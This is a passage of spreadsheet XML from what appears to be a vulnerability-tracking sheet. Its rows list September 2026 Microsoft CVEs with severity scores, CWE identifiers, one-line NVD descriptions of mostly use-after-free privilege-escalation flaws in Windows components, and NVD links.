        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69648</t>
        </is>
      </c>
      <c r="D966" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F966" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I966" s="5" t="inlineStr"/>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr"/>
      <c r="L966" s="5" t="inlineStr"/>
      <c r="M966" s="5" t="inlineStr"/>
      <c r="N966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P966" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q966" s="5" t="inlineStr"/>
      <c r="R966" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S966" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69652</t>
        </is>
      </c>
      <c r="D967" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F967" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I967" s="5" t="inlineStr"/>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr"/>
      <c r="L967" s="5" t="inlineStr"/>
      <c r="M967" s="5" t="inlineStr"/>
      <c r="N967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P967" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q967" s="5" t="inlineStr"/>
      <c r="R967" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S967" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69654</t>
        </is>
      </c>
      <c r="D968" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F968" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G968" s="5" t="inlineStr"/>
      <c r="H968" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I968" s="5" t="inlineStr"/>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr"/>
      <c r="L968" s="5" t="inlineStr"/>
      <c r="M968" s="5" t="inlineStr"/>
      <c r="N968" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P968" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q968" s="5" t="inlineStr"/>
      <c r="R968" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S968" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69682</t>
        </is>
      </c>
      <c r="D969" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F969" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G969" s="5" t="inlineStr"/>
      <c r="H969" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I969" s="5" t="inlineStr"/>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr"/>
      <c r="L969" s="5" t="inlineStr"/>
      <c r="M969" s="5" t="inlineStr"/>
      <c r="N969" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P969" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q969" s="5" t="inlineStr"/>
      <c r="R969" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S969" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69692</t>
        </is>
      </c>
      <c r="D970" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F970" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I970" s="5" t="inlineStr"/>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr"/>
      <c r="L970" s="5" t="inlineStr"/>
      <c r="M970" s="5" t="inlineStr"/>
      <c r="N970" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O970" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P970" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q970" s="5" t="inlineStr"/>
      <c r="R970" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S970" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69693</t>
        </is>
      </c>
      <c r="D971" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F971" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G971" s="5" t="inlineStr"/>
      <c r="H971" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I971" s="5" t="inlineStr"/>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr"/>
      <c r="L971" s="5" t="inlineStr"/>
      <c r="M971" s="5" t="inlineStr"/>
      <c r="N971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P971" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q971" s="5" t="inlineStr"/>
      <c r="R971" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S971" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69694</t>
        </is>
      </c>
      <c r="D972" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F972" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I972" s="5" t="inlineStr"/>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr"/>
      <c r="L972" s="5" t="inlineStr"/>
      <c r="M972" s="5" t="inlineStr"/>
      <c r="N972" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P972" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q972" s="5" t="inlineStr"/>
      <c r="R972" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S972" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69708</t>
        </is>
      </c>
      <c r="D973" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F973" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G973" s="5" t="inlineStr"/>
      <c r="H973" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I973" s="5" t="inlineStr"/>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr"/>
      <c r="L973" s="5" t="inlineStr"/>
      <c r="M973" s="5" t="inlineStr"/>
      <c r="N973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P973" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q973" s="5" t="inlineStr"/>
      <c r="R973" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S973" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69711</t>
        </is>
      </c>
      <c r="D974" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F974" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G974" s="5" t="inlineStr"/>
      <c r="H974" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I974" s="5" t="inlineStr"/>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr"/>
      <c r="L974" s="5" t="inlineStr"/>
      <c r="M974" s="5" t="inlineStr"/>
      <c r="N974" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P974" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q974" s="5" t="inlineStr"/>
      <c r="R974" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S974" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69735</t>
        </is>
      </c>
      <c r="D975" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F975" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G975" s="5" t="inlineStr"/>
      <c r="H975" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I975" s="5" t="inlineStr"/>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr"/>
      <c r="L975" s="5" t="inlineStr"/>
      <c r="M975" s="5" t="inlineStr"/>
      <c r="N975" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P975" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q975" s="5" t="inlineStr"/>
      <c r="R975" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S975" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69779</t>
        </is>
      </c>
      <c r="D976" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F976" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G976" s="5" t="inlineStr"/>
      <c r="H976" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I976" s="5" t="inlineStr"/>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr"/>
      <c r="L976" s="5" t="inlineStr"/>
      <c r="M976" s="5" t="inlineStr"/>
      <c r="N976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P976" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q976" s="5" t="inlineStr"/>
      <c r="R976" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S976" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69791</t>
        </is>
      </c>
      <c r="D977" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F977" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I977" s="5" t="inlineStr"/>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr"/>
      <c r="L977" s="5" t="inlineStr"/>
      <c r="M977" s="5" t="inlineStr"/>
      <c r="N977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P977" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q977" s="5" t="inlineStr"/>
      <c r="R977" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S977" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69806</t>
        </is>
      </c>
      <c r="D978" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F978" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I978" s="5" t="inlineStr"/>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr"/>
      <c r="L978" s="5" t="inlineStr"/>
      <c r="M978" s="5" t="inlineStr"/>
      <c r="N978" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P978" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q978" s="5" t="inlineStr"/>
      <c r="R978" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="S978" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D979" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F979" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I979" s="5" t="inlineStr"/>
      <c r="J979" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K979" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L979" s="5" t="inlineStr"/>
      <c r="M979" s="5" t="inlineStr"/>
      <c r="N979" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P979" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q979" s="5" t="inlineStr"/>
      <c r="R979" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S979" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D980" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F980" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G980" s="5" t="inlineStr"/>
      <c r="H980" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I980" s="5" t="inlineStr"/>
      <c r="J980" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K98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980" s="5" t="inlineStr"/>
      <c r="M980" s="5" t="inlineStr"/>
      <c r="N980" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P980" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q980" s="5" t="inlineStr"/>
      <c r="R980" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S980" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D981" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F981" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G981" s="5" t="inlineStr"/>
      <c r="H981" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I981" s="5" t="inlineStr"/>
      <c r="J981" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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81" s="5" t="inlineStr"/>
      <c r="M981" s="5" t="inlineStr"/>
      <c r="N981" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O981" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P981" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q981" s="5" t="inlineStr"/>
      <c r="R981" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S981" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D982" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F982" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G982" s="5" t="inlineStr"/>
      <c r="H982" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I982" s="5" t="inlineStr"/>
      <c r="J982" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K982" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L982" s="5" t="inlineStr"/>
      <c r="M982" s="5" t="inlineStr"/>
      <c r="N982" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P982" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q982" s="5" t="inlineStr"/>
      <c r="R982" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S982" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D983" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F983" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G983" s="5" t="inlineStr"/>
      <c r="H983" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I983" s="5" t="inlineStr"/>
      <c r="J983" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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83" s="5" t="inlineStr"/>
      <c r="M983" s="5" t="inlineStr"/>
      <c r="N983" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P983" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q983" s="5" t="inlineStr"/>
